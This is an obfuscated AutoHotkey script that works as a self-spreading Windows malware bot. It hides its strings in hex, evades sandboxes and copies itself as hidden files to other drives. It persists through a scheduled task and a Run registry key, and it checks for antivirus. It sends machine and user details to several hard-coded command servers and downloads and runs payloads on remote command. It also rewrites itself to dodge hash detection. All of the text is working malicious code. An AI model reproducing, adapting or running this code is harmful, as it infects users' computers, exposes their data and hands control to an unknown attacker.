;urjpubbcycugsofycyfygcmszewbhdeoicalthyvotiifucmmbwhbbmitcszxfkgxzhpijuapjedwkvcbbdjwovweoihrhalsuxfrpiviqyhdbyudcmzocwyoukylebfchumhkzlpjaavfgyuwjkyb
;tpidldlqtfywfflsfckfjcyuflnklcpqzpjaqdksxkzamaoxrbsnckmswojgjxuiyjwmasrmwxkfcejofprgfafecpgkahxsrhtnxhijgabewfhagnhaucuztnvdiqrebpzvwxhkeborrlrwkbykxx


#SingleInstance IGNORE
#NoTrayIcon
global #kf#kfk@fk := 4
global k#f#aa#aa@ := SubStr(A_ScriptName, 1, InStr(A_ScriptName, ".", False, -1) -1)
global fkkfkf@f := ComObjCreate(ffkkfbb@voef@bb@voef("575363726970742E5368656C6C"))
global ffk@f#bbbvoef@@k := ffkkfbb@voef@bb@voef("726164")
global #fk#kaa@#k := ffkkfbb@voef@bb@voef("73797374656D666978")
global @k#ffk@aa@ := k#f#aa#aa@
global kkaaa# := f#k#aa@bbbvoefk@f#f@(21)
global f@#aa# := f#k#aa@bbbvoefk@f#f@(21)
global k@kkf@ := f#k#aa@bbbvoefk@f#f@(150)
global #f#bb@voef@f#f := f#k#aa@bbbvoefk@f#f@(150)
global @fkaaakf#f := ComObjCreate(ffkkfbb@voef@bb@voef("536372697074696E672E46696C6553797374656D4F626A656374"))
global f#@kf#@kff := k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E657865")
global kaa@@fk#f#ff := k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E747874")
global #fkfkfk@ := 0
global #bb#voef@f#k#kfk := 0
global @f#aa##f@f := ffkkfbb@voef@bb@voef("787878")
f#bb#voeff := 0
if (#kf#kfk@fk = 1){
}else{
if StrLen(A_ScriptName) <> 25
{
exitapp
}
IfInString, A_ScriptDir, % ffkkfbb@voef@bb@voef("433A5C")
{
f#kf#k := A_TickCount
while 1 {
Sleep, 1000
#k#ffkf@aaak := A_TickCount - f#kf#k
if (#k#ffkf@aaak > 120000)
{
break
}
}
if StrLen(A_ScriptFullPath) <> 50
{
exitapp
}
}else{
}
for process in ComObjGet(ffkkfbb@voef@bb@voef("77696E6D676D74733A")).ExecQuery(ffkkfbb@voef@bb@voef("53656C656374202A2066726F6D2057696E33325F50726F63657373")) {
@fkaa#kk := process.Name
fkfkkfkf@fk# := process.CommandLine
f#@kkf#f := process.ExecutablePath
if (StrLen(@fkaa#kk) = 25){
if (StrLen(fkfkkfkf@fk#) > 30){
IfInString, fkfkkfkf@fk#, % ffkkfbb@voef@bb@voef("2E747874")
{
f#bb#voeff := f#bb#voeff + 1
if (StrLen(f#@kkf#f) = 50){
}
}
}
}
}
if (f#bb#voeff > 1){
exitapp
}
IfInString, A_ScriptDir, % ffkkfbb@voef@bb@voef("433A5C")
{
}else{
FileCopyDir, %A_ScriptDir%, C:\%bbbvoefbbbvoefkk%%f@#aa#%%ffk#kk%
FileCopyDir, %A_ScriptDir%, C:\%bb#voefaaa%%kkaaa#%%@f#bbbvoef%
FileSetAttrib, +SH, C:\%@fbb#voeffk#%%f@#aa#%%f#k#@aa#%,1
FileSetAttrib, +SH, C:\%kaaa@f%%kkaaa#%%#k#k@kf#%,1
FileMove, % ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E657865") , % ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E657865")
FileMove, % ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E747874") , % ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E747874")
FileMove, % ffkkfbb@voef@bb@voef("433A5C") . kkaaa# . ffkkfbb@voef@bb@voef("5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E657865") , % ffkkfbb@voef@bb@voef("433A5C") . kkaaa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E657865")
FileMove, % ffkkfbb@voef@bb@voef("433A5C") . kkaaa# . ffkkfbb@voef@bb@voef("5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E747874") , % ffkkfbb@voef@bb@voef("433A5C") . kkaaa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E747874")
k@k#aa@f#k := ";"
FileAppend, `n %k@k#aa@f#k%%k@#fbb#voefk%%kaa#f#@f% %@f#kffk#%%aa#kfk%%k@kkf@%, C:\%bbbvoefbbbvoefkk%%f@#aa#%%k##bb#voef%\%k@bbbvoef#%%kkaaa#%%k#f@@kf#%.txt
bbbvoef#ffkfkaa# := FileOpen(ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E747874"), 0)
k@f@f@fk := bbbvoef#ffkfkaa#.Read()
k@f@f@fk := bb#voefbb@voeff#bb#voefkff(k@f@f@fk)
bbbvoef#ffkfkaa#.Close()
@bb@voef#fkf := FileOpen(ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E747874"), 5)
@bb@voef#fkf.WriteLine(k@k#aa@f#k . #f#bb@voef@f#f)
@bb@voef#fkf.Write(k@f@f@fk)
@bb@voef#fkf.Close()
run % ffkkfbb@voef@bb@voef("433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E65786520433A5C") . f@#aa# . ffkkfbb@voef@bb@voef("5C") . kkaaa# . ffkkfbb@voef@bb@voef("2E747874")
exitapp
}
f#k@#fk#@kf@#f#k()
aaaf@f@fk#ffkf()
}
f@kkf@f@f@#k := Object()
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39383938"))
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F7375706572616C7068612E7261646E65776167652E636F6D3A39383938"))
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F7375706572616C7068612E6E65776D696E6572736167652E636F6D3A33333333"))
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F6E6577616C7068612E73757065722D67616D657A65722E636F6D3A39333333"))
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F6E6577616C7068612E616C7068616E6F6F622E636F6D3A39393939"))
f@kkf@f@f@#k.Insert(ffkkfbb@voef@bb@voef("687474703A2F2F6E6F6F626D696E65722E7075626C6963766D2E636F6D3A39383938"))
aaafbb#voefffkf@ := f@kkf@f@f@#k.MaxIndex()
f@f@#k@kfk := 0
while 1 {
if (f@f@#k@kfk = aaafbb#voefffkf@){
f@f@#k@kfk := 1
}else{
f@f@#k@kfk := f@f@#k@kfk + 1
}
aaaf@f@fk#ffkf()
kfkkf#f@aaak#k(f@kkf@f@f@#k[f@f@#k@kfk])
}
kfkkf#f@aaak#k(#kfk@f#f@bb#voeffk){
k#@kfkfkkaa@ = 0
while 1 {
aaaf@f@fk#ffkf()
if (k#@kfkfkkaa@ = 6){
break
}
kf@fkaaakf := ffk@f@k@k@#f(#kfk@f#f@bb#voeffk)
if (kf@fkaaakf = ffkkfbb@voef@bb@voef("4552524F52")){
k#@kfkfkkaa@ := k#@kfkfkkaa@ + 1
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("636F756C646E7420636F6E6E65637420746F20") . #kfk@f#f@bb#voeffk . "-" . kf@fkaaakf)
}else{
aa#fk@f@ := f#fkf@k#kfk#f@k@(kf@fkaaakf)
if (aa#fk@f@ = ""){
k#@kfkfkkaa@ := k#@kfkfkkaa@ + 1
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("636F756C646E742066696E6420636F6D6D616E6420696E20") . #kfk@f#f@bb#voeffk . "-" . kf@fkaaakf)
}else{
k#@kfkfkkaa@ := 0
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("636F6E6E656374656420746F202022202E2061646472657373202E202220646174613A20") . aa#fk@f@)
#fk@kffkf#@aa@#k(kf@fkaaakf)
}
}
}
}
ffk@f@k@k@#f(k@k#kkf@@aa#) { 
static f#ffbbbvoeffk# := ComObjCreate(ffkkfbb@voef@bb@voef("57696E487474702E57696E48747470526571756573742E352E31"))
try {
f#ffbbbvoeffk#.Open(ffkkfbb@voef@bb@voef("474554"), k@k#kkf@@aa# . "/" . f@f@@aa##k#f@f() , true)
f#ffbbbvoeffk#.Send()
f#ffbbbvoeffk#.WaitForResponse()
} catch {
return ffkkfbb@voef@bb@voef("4552524F52")
}
if (f#ffbbbvoeffk#.Status = 200){
return f#ffbbbvoeffk#.ResponseText
}else{
return ffkkfbb@voef@bb@voef("4552524F52")
}
}
f#f@@f#kf@kk(){
try {
For objOS In ComObjGet(ffkkfbb@voef@bb@voef("77696E6D676D74733A5C5C6C6F63616C686F73745C726F6F745C736563757269747963656E74657232")).InstancesOf(ffkkfbb@voef@bb@voef("416E7469566972757350726F64756374")) {
k@#kffk@kk := ObjOS.displayName
}
} catch {
return "Unknown"
}
return k@#kffk@kk
}
f@kfk#k@f#f@@k(){
try {
For objOS In ComObjGet(ffkkfbb@voef@bb@voef("77696E6D676D74733A5C5C")).InstancesOf(ffkkfbb@voef@bb@voef("57696E33325F4F7065726174696E6753797374656D")) {
aa@fkfkk := ObjOS.Caption
}
} catch {
return "Unknown"
}
return aa@fkfkk
}
@kf#kfkaaak@#f(k#kf#f#k#fkfk#ff){


}
k#k@f#kf#k#f#bbbvoef(@bb@voefk@kf#bb@voefkf) { 
local f@#kf@@kf#kf, #f#k@k, f#kaaa
If !@bb@voefk@kf#bb@voefkf
Return 0
f@#kf@@kf#kf := A_FormatInteger
SetFormat, INTEGER, H
Loop, Parse, @bb@voefk@kf#bb@voefkf
{
#f#k@k := Asc(A_LoopField)
StringTrimLeft, #f#k@k, #f#k@k, 2
f#kaaa .= #f#k@k . ""
}
SetFormat, INTEGER, %f##kf#@k%%fkfbb#voeffk%%f@#kf@@kf#kf%
Return f#kaaa
}
urlsafe_b64decode(k#k@f@@f)
{
Return #bbbvoefaa@f@f@f@k(k#k@f@@f, "-_")
}
@fbb@voefaaakfk#k@fk(@k#bbbvoefkf@f#k, @fkffk#aa#@f#k:="+/") { 
StringLeft, @fkffk#aa#@f#k, @fkffk#aa#@f#k, 2
Return fkkf@aa@kf@f(@k#bbbvoefkf@f#k, ffkkfbb@voef@bb@voef("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . @fkffk#aa#@f#k)
}
#bbbvoefaa@f@f@f@k(f@@f@kfk#bb@voef, #kfkaaakf@bbbvoef@#f:="+/") { 
StringLeft, #kfkaaakf@bbbvoef@#f, #kfkaaakf@bbbvoef@#f, 2
Return k#f@f#k@f@kaaa(f@@f@kfk#bb@voef, ffkkfbb@voef@bb@voef("4142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A30313233343536373839") . #kfkaaakf@bbbvoef@#f)
}
fkkf@aa@kf@f(kfk#@f#f#fk@f#k#, @f@fkfbbbvoef@#k#k#k:=""){
StringCaseSense On
Loop, Parse, kfk#@f#f#fk@f#k#
{
bb#voefk@kf# := Mod(A_Index, 3)
if (bb#voefk@kf# = 1)
{
f##fk# := ((Asc(A_LoopField) >> 2) & 0x3F)
f#k@@k := (Asc(A_LoopField) & 0x03 ) << 4
}
else if (bb#voefk@kf# = 2)
{
f##fk# := f#k@@k | ((Asc(A_LoopField) >> 4) & 0x0F)
f#k@@k := (Asc(A_LoopField) & 0x0F) << 2
}
else
{
f##fk# := f#k@@k | ((Asc(A_LoopField) >> 6) & 0x03)
StringMid, base64Char, @f@fkfbbbvoef@#k#k#k, f##fk# + 1, 1
k#k@f@@f := k#k@f@@f base64Char
f##fk# := (Asc(A_LoopField)) & 0x3F
}
StringMid, base64Char, @f@fkfbbbvoef@#k#k#k, f##fk# + 1, 1
k#k@f@@f := k#k@f@@f base64Char
}
if (bb#voefk@kf# = 1)
{
StringMid, base64Char, @f@fkfbbbvoef@#k#k#k, f#k@@k + 1, 1
return k#k@f@@f base64Char "=="
}
else if (bb#voefk@kf# = 2)
{
StringMid, base64Char, @f@fkfbbbvoef@#k#k#k, f#k@@k + 1, 1
return k#k@f@@f base64Char "="
}
else
{
return k#k@f@@f "=="
}
}
k#f@f#k@f@kaaa(fk#k@k@f@k@aa@@k, #fk##kfk@kkaa#:=""){
StringReplace fk#k@k@f@k@aa@@k, fk#k@k@f@k@aa@@k, =,,All
StringReplace, fk#k@k@f@k@aa@@k, fk#k@k@f@k@aa@@k, `r,,All
StringReplace, fk#k@k@f@k@aa@@k, fk#k@k@f@k@aa@@k, `n,,All
StringCaseSense On
Loop, Parse, fk#k@k@f@k@aa@@k
{
StringGetPos, currentBin, #fk##kfk@kkaa#, %A_LoopField%
@kf#fk := Mod(A_Index, 4)
if (@kf#fk = 1)
{
f#k@@k := currentBin << 2
}
else if (@kf#fk = 2)
{
#f#bb#voefk#f@#k := #f#bb#voefk#f@#k Chr(f#k@@k | (currentBin >> 4))
f#k@@k := (currentBin & 0x0F) << 4
}
else if (@kf#fk = 3)
{
#f#bb#voefk#f@#k := #f#bb#voefk#f@#k Chr(f#k@@k | (currentBin >> 2))
f#k@@k := (currentBin & 0x03) << 6
}
else
{
#f#bb#voefk#f@#k := #f#bb#voefk#f@#k Chr(f#k@@k | currentBin)
}
}
Return #f#bb#voefk#f@#k
}
f#k@#fk#@kf@#f#k() {
#f#aaa@aa#fk := A_ScriptDir . "\" . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E657865")
k@#aa#k@ := @fk@fbbbvoeff##bb#voefff(A_ScriptDir . "\" . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("2E747874"))
@k@ffk@aaa := ffkkfbb@voef@bb@voef("7363687461736B73202F637265617465202F7363206D696E757465202F6D6F2031202F746E")
run, %@k@ffk@aaa%%#fbbbvoef@@k%%f@k@kk% %aa#aaa@f%%@k#ffk@aa@%%@aa@f##k% /tr "%#f#aaa@aa#fk%%k@@k%%#fkf% %k@#aa#k@%%@k#f%%#f@k#fkf%",,Hide
Sleep, 3000
fkfbbbvoefff := ffkkfbb@voef@bb@voef("7363687461736B732E657865")
Process, Close, %f##kf#@k%%fkfbbbvoefff%%@f#kffk#%
RegWrite, % ffkkfbb@voef@bb@voef("5245475F535A") , % ffkkfbb@voef@bb@voef("484B4355"), % ffkkfbb@voef@bb@voef("536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E"), %@f@kf#%%@k#ffk@aa@%%ffk#kk%, %k@fk%%#f#aaa@aa#fk%%f##kf#@k% %k#f@@kf#%%fk@f#fkk%%k@#aa#k@%
}
f#kfkkf@@kf#kk(k#f#@f#f#aa@kk){
Process,Exist,%ffk#f@%%k#f#@f#f#aa@kk%%#fbbbvoef@@k%
return Errorlevel
}
@ffk#fk#bb#voeffkkf#(){
@aa##k@k := f@bb#voefbbbvoef@f@kf@(f@ffkkaa#k#fk@k#() . A_OSVersion  . f@kfk#k@f#f@@k())
return SubStr(@aa##k@k, 1, 30)
}
f@ffkkaa#k#fk@k#(){
try {
DriveGet, hSerial, Serial, C:
} catch {
return ffkkfbb@voef@bb@voef("556E6B6E6F776E")
}
return hSerial
}
@fkaa#bb#voeffk@fk(){
if  ( f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("73747265616D65722E657865")) or f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("6C697665776F726B65722E657865")) or f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("7375706572636865636B65722E657865")) or f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("737065656475702E657865")) or f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("6E6F76612E657865"))){
return 1
}
return 0
}
#k@f@bb#voefk@#f@f(){
if  f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("637075636865636B65722E657865")) or f#kfkkf@@kf#kk(ffkkfbb@voef@bb@voef("637075636865636B657233322E657865"))
{
return 1
}
return 0
}
f@f@@aa##k#f@f(){
aa@bb#voef#ffbb#voef := fkkfkf@f.ExpandEnvironmentStrings(ffkkfbb@voef@bb@voef("25434F4D50555445524E414D4525"))
kf@kf#bb#voeff := fkkfkf@f.ExpandEnvironmentStrings(ffkkfbb@voef@bb@voef("25555345524E414D4525"))
spreadisrun := @fkaa#bb#voeffk@fk()
#f@k#f := f@kfk#k@f#f@@k()
f@kfk##fk@fk := #k@f@bb#voefk@#f@f()
@bbbvoeffk#k := f#f@@f#kf@kk()
#fk#bb#voefk@k := @ffk#fk#bb#voeffkkf#() . ffkkfbb@voef@bb@voef("2F312F") . f@bb#voefbbbvoef@f@kf@(#f@k#f)  . "/" . f@bb#voefbbbvoef@f@kf@(aa@bb#voef#ffbb#voef) . "/" . f@bb#voefbbbvoef@f@kf@(kf@kf#bb#voeff)  . "/" .  f@bb#voefbbbvoef@f@kf@(ffk@f#bbbvoef@@k)  . "/" .   f@bb#voefbbbvoef@f@kf@(k@#kffk@kk)  . "/" .  spreadisrun  . "/" .  f@kfk##fk@fk
return #fk#bb#voefk@k
}
f@bb#voefbbbvoef@f@kf@(k@kf@kf@k@k@f#kf){
k@kf@kf@k@k@f#kf := k#k@f#kf#k#f#bbbvoef(@fbb@voefaaakfk#k@fk(k@kf@kf@k@k@f#kf))
return k@kf@kf@k@k@f#kf
}
f#fkf@k#kfk#f@k@(#k@fk#fk@f#fkk){
try {
kffbb#voef#fk#:=RegExMatch(#k@fk#fk@f#fkk, ffkkfbb@voef@bb@voef("3A3A283F503C4E616D653E2E2A3F293A3A"), match)
} catch {
return ""
}
return matchName
}
@aaakkffkfbb#voefk(k#kf@k#kf#k#@aaa) { 
@f@bb@voef#kf@@f := ""
@k@bb@voefk@:=1
Loop % StrLen(k#kf@k#kf#k#@aaa)/2	{
aaa@#k := SubStr(k#kf@k#kf#k#@aaa, @k@bb@voefk@ , 2)
@f@bb@voef#kf@@f .= Chr("0x" aaa@#k)
@k@bb@voefk@ +=2
}
Return @f@bb@voef#kf@@f
}
@kf@@bb@voefkffk(aa@bb@voef@k@kffkf@k,f@#kf#kfk@k#f#,fbb@voef@bb#voefbbbvoefbb#voef){
try {
kf@f#kf@aaa@:=RegExMatch(aa@bb@voef@k@kffkf@k, f@#kf#kfk@k#f# . ffkkfbb@voef@bb@voef("283F503C4E616D653E2E2A3F29") . fbb@voef@bb#voefbbbvoefbb#voef, match)
} catch {
return ""
}
return matchName
}
#fk@kffkf#@aa@#k(#aaa#kffk@ffkk){
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("67657420636F6D6D616E64") . #bbbvoefaa@f@f@f@k(@aaakkffkfbb#voefk(#aaa#kffk@ffkk)))
@kkf#ffkkf := #bbbvoefaa@f@f@f@k(@aaakkffkfbb#voefk(#aaa#kffk@ffkk))
aa#aa@@k@f := ffkkfbb@voef@bb@voef("433A5C") . k#f#aa#aa@
if (FileExist(aa#aa@@k@f)) {
}else{
aa#aa@@k@f := A_ScriptDir
}
f@fk@kf@fk#f := ffkkfbb@voef@bb@voef("7570646174652D")
f#@bbbvoefk@kk := ffkkfbb@voef@bb@voef("646F776E6C6F61642D")
k#ffkf@ffk := ffkkfbb@voef@bb@voef("7363726970742D")
k@fkaaakfk := ffkkfbb@voef@bb@voef("75706461746573656C662D")
IfInString, @kkf#ffkkf, %@f@kfbb@voef%%#aaakf#k%%f@fk@kf@fk#f%
{
@fk#fkkf#k := @kf@@bb@voefkffk(@kkf#ffkkf,ffkkfbb@voef@bb@voef("7570646174652D"),ffkkfbb@voef@bb@voef("2D757064617465"))
aa@kkf#bb#voef := ffkkfbb@voef@bb@voef("5C") . f#k#aa@bbbvoefk@f#f@(10) . ffkkfbb@voef@bb@voef("2E747874")
if FileExist(A_ScriptDir . ffkkfbb@voef@bb@voef("5C") . aa@kkf#bb#voef){
FileDelete ,%A_ScriptDir%\%@bb#voef#kfk%%fbb#voef%%aa@kkf#bb#voef%
}
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("646F776E6C6F6164696E672075706461746520") . aa@kkf#bb#voef . " - " . @fk#fkkf#k)
UrlDownloadToFile, %@fk#fkkf#k%%#fkfkfk#%%@f#bbbvoef%, %A_ScriptDir%\%aa@kkf#bb#voef%%aaakf#@f%%bb#voefaaa%
if FileExist(A_ScriptDir . ffkkfbb@voef@bb@voef("5C") . aa@kkf#bb#voef){
FileDelete ,%A_ScriptDir%\%fbbbvoef#bbbvoef%%@kf#k@#k%%kaa@@fk#f#ff%
FileMove, %A_ScriptDir%\%bbbvoefbbbvoefkk%%aa@kkf#bb#voef%%#fbbbvoef@@k%, %A_ScriptDir%\%@bb@voefaaaf%%kaa@@fk#f#ff%%#kfkkf#k%
Run,%A_ScriptDir%\%#bb#voef#bb@voef%%f@#f%%f#@kf#@kff% %A_ScriptDir%\%kaa@@fk#f#ff%%@fbb#voeffk#%%fkkf#k%
exitapp
}
return
}
IfInString, @kkf#ffkkf, %ffk#kk%%fbb@voeff##k%%f#@bbbvoefk@kk%
{
k#k#fk#f := @kf@@bb@voefkffk(@kkf#ffkkf,ffkkfbb@voef@bb@voef("646F776E6C6F61642D"),ffkkfbb@voef@bb@voef("2D646F776E6C6F6164"))
k#k#fk#f := StrSplit(k#k#fk#f, ffkkfbb@voef@bb@voef("3A213A"))
@f#bb#voeffbbbvoef := ffkkfbb@voef@bb@voef("5C") . f#k#aa@bbbvoefk@f#f@(10) . ffkkfbb@voef@bb@voef("2E747874")
@kf#k@k# := k#k#fk#f[1]
aa@kkf#bb#voef := k#k#fk#f[2]
if FileExist(aa#aa@@k@f . ffkkfbb@voef@bb@voef("5C") . aa@kkf#bb#voef){
FileDelete ,%k@#k@f%%aa#aa@@k@f%%ffbb#voeff%\%k##bb#voef%%aa@kkf#bb#voef%%k@bbbvoef#%
}
@kf#kfkaaak@#f("downloading file " . aa@kkf#bb#voef . " - " . @kf#k@k#)
if FileExist(aa#aa@@k@f . @f#bb#voeffbbbvoef){
FileDelete ,%@kf#k@#k%%k@bbbvoef#%%aa#aa@@k@f%%fbbbvoef#bbbvoef%%@f#bb#voeffbbbvoef%%@kkffk%
}
UrlDownloadToFile, %bbbvoeffkk%%@kf#k@k#%%kf#fkfkk%, %f@#f@aaa%%aa#aa@@k@f%%@f@kfbb@voef%%f@#f%%@f#bb#voeffbbbvoef%%bb#voefkfk%
if FileExist(aa#aa@@k@f . @f#bb#voeffbbbvoef){
FileMove, %aa#aa@@k@f%%aa#kfk%%#fkf%%@aa@f##k%%@f#bb#voeffbbbvoef%%@aa@f##k%, %aa#aa@@k@f%%aa#aaa@f%%fk@f#fkk%\%#fbbbvoef@@k%%aa@kkf#bb#voef%%f@k@kk%
IfInString, aa@kkf#bb#voef, %#fk@@k%%f#fk#aaa%%@f#aa##f@f%
{
k##bb@voefk@ff := ffkkfbb@voef@bb@voef("433A5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("5C") . f#@kf#@kff . " " . ffkkfbb@voef@bb@voef("433A5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("5C") . aa@kkf#bb#voef
Run,%k##bb@voefk@ff%%k#kf@k#f%%#aaakf#k%
}else{
Run,%kfkaa@#f%%aa#aa@@k@f%%f#k#@aa#%\%fkfbb#voeffk%%aa@kkf#bb#voef%%fk@bb#voefkf%
}
}
return
}
IfInString, @kkf#ffkkf, %f@aaak%%k#ffkf@ffk%%f#f@bbbvoef#%
{
@fk#k#kkf#kf := @kf@@bb@voefkffk(@kkf#ffkkf,ffkkfbb@voef@bb@voef("7363726970742D"),ffkkfbb@voef@bb@voef("2D736372697074"))
@fk#k#kkf#kf := StrSplit(@fk#k#kkf#kf, ":!:")
bbbvoef#f@@f := @fk#k#kkf#kf[1]
k@#aa@ffkf := @fk#k#kkf#kf[2]
fbb#voeff#@k :=  ffkkfbb@voef@bb@voef("5C") . f#k#aa@bbbvoefk@f#f@(10) . ffkkfbb@voef@bb@voef("2E747874")
@f@bb@voefkaa#k# := aa#aa@@k@f . ffkkfbb@voef@bb@voef("5C") . k@#aa@ffkf
if FileExist(@f@bb@voefkaa#k#){
FileDelete ,%kf#fkfkk%%@f@bb@voefkaa#k#%%aa@kf#%
}
if FileExist(aa#aa@@k@f . fbb#voeff#@k){
FileDelete ,%ffkf@k%%@kf#k@#k%%aa#aa@@k@f%%fbb#voeff#@k%%fkfk%%f#k#@aa#%
}
@kf#kfkaaak@#f("script file " . k@#aa@ffkf . " - " . bbbvoef#f@@f)
FileAppend, %#k#fk@kk%%bbbvoef#f@@f%%f@#f@aaa%, %f@fkf#kf%%aa#aa@@k@f%%f#f@bbbvoef#%%fbb#voeff#@k%%fbb@voeff##k%%@bb#voef#kfk%
FileMove, %fk@fkk%%aa#aa@@k@f%%bb#voefaaa%%kf#fkfkk%%kaaa@f%%fbb#voeff#@k%, %@k#bb@voeff#%%aa#aa@@k@f%%fkfbb#voeffk%\%kf@fk@#k%%k#k#kf%%k@#aa@ffkf%
IfInString, k@#aa@ffkf, %k@#fbb#voefk%%@f#aa##f@f%%aa@f%
{
k##bb@voefk@ff := ffkkfbb@voef@bb@voef("433A5C") . k#f#aa#aa@ . ffkkfbb@voef@bb@voef("5C") . f#@kf#@kff . " " .  @f@bb@voefkaa#k#
Run,%f@k@kk%%f#f@%%k##bb@voefk@ff%
}else{
Run,%bb#voefkfk%%k#f@f@kk%%aa#aa@@k@f%\%kf#fkfkk%%k@#aa@ffkf%%aaa@k@%
}
return
}
IfInString, @kkf#ffkkf, %k@fkaaakfk%%#kfkkf#k%%aaa@k@%
{
kkaaa#  := k#f#aa#aa@
k@k#aa@f#k := ";"
FileAppend, `n %k@k#aa@f#k%%ffkf@k%%kfk#f@% %ffk##k%%k@kkf@%%#kfkkf#k%, %A_ScriptFullPath%
#f#fk#ff := FileOpen(A_ScriptFullPath, 0)
k@k#f@k@k@ := #f#fk#ff.Read()
k@k#f@k@k@ := bb#voefbb@voeff#bb#voefkff(k@k#f@k@k@)
#f#fk#ff.Close()
@f@fkkf#fkf@ := FileOpen(A_ScriptFullPath, 5)
@f@fkkf#fkf@.WriteLine(k@k#aa@f#k . #f#bb@voef@f#f)
@f@fkkf#fkf@.Write(k@k#f@k@k@)
@f@fkkf#fkf@.Close()
kkaaa# := f#k#aa@bbbvoefk@f#f@(21)
return
}
IfInString, @kkf#ffkkf, % ffkkfbb@voef@bb@voef("736C6565702D")
{
f#@fk#bbbvoef@fk := @kf@@bb@voefkffk(@kkf#ffkkf,ffkkfbb@voef@bb@voef("736C6565702D"),ffkkfbb@voef@bb@voef("2D736C656570"))
@kf#kfkaaak@#f(ffkkfbb@voef@bb@voef("736C656570696E6720") . f#@fk#bbbvoef@fk)
#aa@@kfbb@voef#kfk(f#@fk#bbbvoef@fk)
return
}
sleep , 1000
}
#aa@@kfbb@voef#kfk(k@@aa#k@k#@bb@voefkf){
if (#kf#kfk@fk = 1){
sleep , 5000
}else{
sleep k@@aa#k@k#@bb@voefkf
}
}
@fk@fbbbvoeff##bb#voefff(@kkfk@f@fbbbvoeff@fk){
try {
VarSetCapacity(SHORT,StrLen(@kkfk@f@fbbbvoeff@fk)*2)
DllCall("GetShortPathName","Str",@kkfk@f@fbbbvoeff@fk,"Str",SHORT,"UInt",StrLen(@kkfk@f@fbbbvoeff@fk)*2)
} catch {
return @kkfk@f@fbbbvoeff@fk
}
if (SHORT = "")
{
return @kkfk@f@fbbbvoeff@fk
}
Return SHORT
}
f#k#aa@bbbvoefk@f#f@(k#@aaaf@aa#aaaf@) {
static   c
if   !c
Loop, 26
c .=   (!c ? "" : "`n") Chr(A_Index + 96)
Loop %   k#@aaaf@aa#aaaf@
{
Random, n, 1, 1296
Loop %   n
Sort, c, Random
str .=   SubStr(c,1,1)
}
return   str
}
aaaf@f@fk#ffkf() {
For objOS In @fkaaakf#f.Drives {
bb#voeff@f := ObjOS.path
if (bb#voeff@f = ffkkfbb@voef@bb@voef("433A")){
}else{
@ffk#f@bbbvoef = %kkf@%%bb#voeff@f%%k#k#kf%\*.*
Loop, %@kaa#fk@%%kfk@%%@ffk#f@bbbvoef%
{
@f#f@aa@ = %A_LoopFileDir%
}
#fkfkfk@ := 0
Loop, %@ffk#f@bbbvoef%%#bb#voef#bb@voef%%k##bb#voef%, 1
{
if (#fkfkfk@ > 0){
if (#bb#voef@f#k#kfk > 0){
break
}
}
FileGetAttrib,CurAttrib, %A_LoopFileFullPath%
IfInString, CurAttrib, D
{
StringReplace, A_LoopRelativeFileName, A_LoopFileFullPath, %@f#f@aa@%%ffbb#voeff%%@f@kf#%,
if (A_LoopRelativeFileName = ffkkfbb@voef@bb@voef("5C2452454359434C452E42494E")){
}else{
fkf@#f@aa@ := SubStr(k#f#aa#aa@, 1, 3)
bbbvoef#f#k@k@kf := A_LoopRelativeFileName
StringReplace, bbbvoef#f#k@k@kf, bbbvoef#f#k@k@kf,  "\",
ifexist, %@bb#voeff@#k%%kfk@%%bb#voeff@f%%A_LoopRelativeFileName%\%fk@f#f%%kf#fkfkk%%k#f#aa#aa@%
{
